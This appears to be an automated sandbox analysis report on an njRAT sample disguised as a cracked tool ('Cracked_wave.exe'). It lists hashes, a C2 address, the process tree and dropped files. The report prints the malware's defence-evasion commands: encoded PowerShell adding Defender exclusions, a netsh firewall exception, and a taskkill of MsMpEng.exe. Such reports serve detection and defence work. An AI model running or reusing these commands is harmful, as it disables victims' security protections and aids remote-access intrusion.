Analysis

  • max time kernel
    150s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  • submitted
    26-07-2024 19:07

General

  • Target

    Cracked_wave.exe

  • Size

    26.0MB

  • MD5

    9330b25f7ac3eb34a5f5b8f724e9cda1

  • SHA1

    29853b957e4b073f83f25fc7b333a4fc262792e3

  • SHA256

    b4dbcee5210537d5ec0a232990fccb8018bf898c88636849e6fc4bb38de62436

  • SHA512

    c3fdf6114fc370d8db27091f1e4b3e19fc123e05bbba3b1f96c748d25bacccb8b32f2da9a96141a7b6af524a66fda67658aab5aa75f93fdb29031a43bc7a885d

  • SSDEEP

    786432:B7zjkRQo93SGLxRIHn6MX52t7wQepJ1kNXXjh:WmsD1M6O52tRev1k1Th

Malware Config

Extracted

Family

njrat

Version

im523

Botnet

HacKed

C2

20.ip.gl.ply.gg:55257

Mutex

319c1637f1925d788496e1f3109ae4f7

Attributes
  • reg_key

    319c1637f1925d788496e1f3109ae4f7

  • splitter

    |'|'|

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 11 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Drops autorun.inf file 1 TTPs 5 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in Windows directory 2 IoCs
  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 39 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Cracked_wave.exe
    "C:\Users\Admin\AppData\Local\Temp\Cracked_wave.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:776
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAcABrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAdgBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AdQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAZAB6ACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1292
    • C:\Users\Admin\AppData\Roaming\WaveWindows.exe
      "C:\Users\Admin\AppData\Roaming\WaveWindows.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2352
    • C:\Users\Admin\AppData\Local\Builder.exe
      "C:\Users\Admin\AppData\Local\Builder.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2672
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAbQB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAbgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAaABkACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAaABxACMAPgA="
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2748
      • C:\Windows\Systeminteracts (32 bit).exe
        "C:\Windows\Systeminteracts (32 bit).exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2636
        • C:\Users\Admin\AppData\Roaming\wsappx.exe
          "C:\Users\Admin\AppData\Roaming\wsappx.exe"
          4⤵
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops autorun.inf file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2624
          • C:\Windows\SysWOW64\netsh.exe
            netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\wsappx.exe" "wsappx.exe" ENABLE
            5⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:2008
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM MsMpEng.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2064
      • C:\Users\Admin\OneDrive.exe
        "C:\Users\Admin\OneDrive.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2852
        • C:\Users\Admin\OneDrive.exe
          "C:\Users\Admin\OneDrive.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:1440

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\_MEI28522\api-ms-win-core-file-l1-2-0.dll

    Filesize

    21KB

    MD5

    1c58526d681efe507deb8f1935c75487

    SHA1

    0e6d328faf3563f2aae029bc5f2272fb7a742672

    SHA256

    ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2

    SHA512

    8edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1

  • C:\Users\Admin\AppData\Local\Temp\_MEI28522\api-ms-win-core-file-l2-1-0.dll

    Filesize

    18KB

    MD5

    bfffa7117fd9b1622c66d949bac3f1d7

    SHA1

    402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

    SHA256

    1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

    SHA512

    b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

  • C:\Users\Admin\AppData\Local\Temp\_MEI28522\api-ms-win-core-localization-l1-2-0.dll

    Filesize

    21KB

    MD5

    724223109e49cb01d61d63a8be926b8f

    SHA1

    072a4d01e01dbbab7281d9bd3add76f9a3c8b23b

    SHA256

    4e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210

    SHA512

    19b0065b894dc66c30a602c9464f118e7f84d83010e74457d48e93aaca4422812b093b15247b24d5c398b42ef0319108700543d13f156067b169ccfb4d7b6b7c

  • C:\Users\Admin\AppData\Local\Temp\_MEI28522\api-ms-win-core-timezone-l1-1-0.dll

    Filesize

    21KB

    MD5

    d12403ee11359259ba2b0706e5e5111c

    SHA1

    03cc7827a30fd1dee38665c0cc993b4b533ac138

    SHA256

    f60e1751a6ac41f08e46480bf8e6521b41e2e427803996b32bdc5e78e9560781

    SHA512

    9004f4e59835af57f02e8d9625814db56f0e4a98467041da6f1367ef32366ad96e0338d48fff7cc65839a24148e2d9989883bcddc329d9f4d27cae3f843117d0

  • C:\Users\Admin\AppData\Local\Temp\_MEI28522\python39.dll

    Filesize

    4.3MB

    MD5

    5cd203d356a77646856341a0c9135fc6

    SHA1

    a1f4ac5cc2f5ecb075b3d0129e620784814a48f7

    SHA256

    a56afcf5f3a72769c77c3bc43c9b84197180a8b3380b6258073223bfd72ed47a

    SHA512

    390008d57fa711d7c88b77937bf16fdb230e7c1e7182faea6d7c206e9f65ced6f2e835f9da9befb941e80624abe45875602e0e7ad485d9a009d2450a2a0e0f1f

  • C:\Users\Admin\AppData\Local\Temp\_MEI28522\ucrtbase.dll

    Filesize

    992KB

    MD5

    0e0bac3d1dcc1833eae4e3e4cf83c4ef

    SHA1

    4189f4459c54e69c6d3155a82524bda7549a75a6

    SHA256

    8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

    SHA512

    a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RXMJVXUS78U77FN4MK16.temp

    Filesize

    7KB

    MD5

    87e26b2538608b5e171e29dd06db8a5e

    SHA1

    d6a0d6628ef768440ae08a5ea80fe7718fe4dcf6

    SHA256

    369b284ef981ea386048913b84005b77c6ddab331697d18299b6504b2f4aa3b2

    SHA512

    463d65290694805d619b7a8c575df15058b247cdd8f28e3d1d93341d7fefda8fad96565ea8e12719d1c982b509fdca0b84d72ed815bb82e373522d2ba97bd6c4

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    314e6523e04e2d8314fc607cf9ec2f65

    SHA1

    ab0eb632e37bbd142f0455c00d01a540a67f674f

    SHA256

    5fe3123de7b9f6e3bc05922b2bf544b7d406864f760f6a99e601e44f3533d67c

    SHA512

    0b27beb891a87d2b113af0719154a37c06795b4cf7846a1b135987aa58676c4fc1ae31dcb93693af9854e1528ea0527900a7bb941d34b7132a4f12e6a25c2353

  • C:\Users\Admin\OneDrive.exe

    Filesize

    17.7MB

    MD5

    6624b0557bdbe30b3f3095e5c72ff3b1

    SHA1

    1ebfece0cf160f9a01ce15cf191b0e1bedadfdea

    SHA256

    500fcb5105e0ad997d404f7cad43f72db8bc32dfd6dc3f83e9bb6dcb94dfe49c

    SHA512

    f8ee5149c76acf1b5f44bfd0c84c53934b1fa7fafd61bb23093d348dfcf8156ded762816fb988a727bfe828369696fea79b37d9fddf915ce672caf9c0f2971fe

  • C:\Windows\Systeminteracts (32 bit).exe

    Filesize

    37KB

    MD5

    fb3f9f675ace4b0e2e3938b40b4a016e

    SHA1

    e45bd61c9830bbdaa413f1e5addf2e05c9ccfd6e

    SHA256

    d2673072e29073998e65da0023a0f4f6d96493ecdfbfee84b044b1947eef11d5

    SHA512

    ebd2ff3940962155c9ee78dced5a2a2967f81084707e111a47af7fc60109996f4c87ab962c3deac1336464677b99cb48ea3ef76315cedcfd68232678439505f9

  • \Users\Admin\AppData\Local\Builder.exe

    Filesize

    17.8MB

    MD5

    d62817e1f87aedd6b9fdfae5d80d706a

    SHA1

    a98f0f233417d339d831b6989f09322610c8557f

    SHA256

    22b8be8e56910f91060262cf18ae227a13ef5da69f4eb781d98ff81d238fe7fc

    SHA512

    a72394560340f4032d19a2b578023d56cd6b2e710cf0cf3562d824a3c8d72d54ac1cf4e6f64d17524f3410d3b1773486b8e8654d9dbe3a7e96ecbf212e4c3603

  • \Users\Admin\AppData\Local\Temp\_MEI28522\api-ms-win-core-processthreads-l1-1-1.dll

    Filesize

    21KB

    MD5

    517eb9e2cb671ae49f99173d7f7ce43f

    SHA1

    4ccf38fed56166ddbf0b7efb4f5314c1f7d3b7ab

    SHA256

    57cc66bf0909c430364d35d92b64eb8b6a15dc201765403725fe323f39e8ac54

    SHA512

    492be2445b10f6bfe6c561c1fc6f5d1af6d1365b7449bc57a8f073b44ae49c88e66841f5c258b041547fcd33cbdcb4eb9dd3e24f0924db32720e51651e9286be

  • \Users\Admin\AppData\Roaming\WaveWindows.exe

    Filesize

    8.0MB

    MD5

    b8631bbd78d3935042e47b672c19ccc3

    SHA1

    cd0ea137f1544a31d2a62aaed157486dce3ecebe

    SHA256

    9cfda541d595dc20a55df5422001dfb58debd401df3abff21b1eee8ede28451c

    SHA512

    0c51d6247e39f7851538a5916b24972e845abfe429f0abdc7b532f654b4afe73dc6e1936f1b062da63bfc90273d3cbc297bf6c802e615f3711d0f180c070aa26

  • memory/2352-161-0x00000000006B0000-0x0000000000762000-memory.dmp

    Filesize

    712KB

  • memory/2352-190-0x0000000000CB0000-0x0000000000CBA000-memory.dmp

    Filesize

    40KB

  • memory/2352-172-0x0000000000510000-0x0000000000518000-memory.dmp

    Filesize

    32KB

  • memory/2352-170-0x0000000000E50000-0x0000000000EF0000-memory.dmp

    Filesize

    640KB

  • memory/2352-10-0x0000000001250000-0x0000000001A52000-memory.dmp

    Filesize

    8.0MB

  • memory/2352-188-0x0000000000770000-0x000000000077A000-memory.dmp

    Filesize

    40KB

  • memory/2352-189-0x0000000000770000-0x000000000077A000-memory.dmp

    Filesize

    40KB

  • memory/2352-174-0x0000000000530000-0x0000000000538000-memory.dmp

    Filesize

    32KB

  • memory/2352-191-0x0000000006810000-0x0000000006886000-memory.dmp

    Filesize

    472KB

  • memory/2352-192-0x0000000000D20000-0x0000000000D2A000-memory.dmp

    Filesize

    40KB

  • memory/2352-193-0x0000000001090000-0x00000000010C2000-memory.dmp

    Filesize

    200KB

  • memory/2352-194-0x00000000011D0000-0x00000000011F6000-memory.dmp

    Filesize

    152KB

  • memory/2352-195-0x00000000010C0000-0x00000000010C8000-memory.dmp

    Filesize

    32KB

  • memory/2352-197-0x0000000005230000-0x0000000005246000-memory.dmp

    Filesize

    88KB

  • memory/2352-199-0x00000000053D0000-0x00000000053DA000-memory.dmp

    Filesize

    40KB

  • memory/2352-346-0x0000000000770000-0x000000000077A000-memory.dmp

    Filesize

    40KB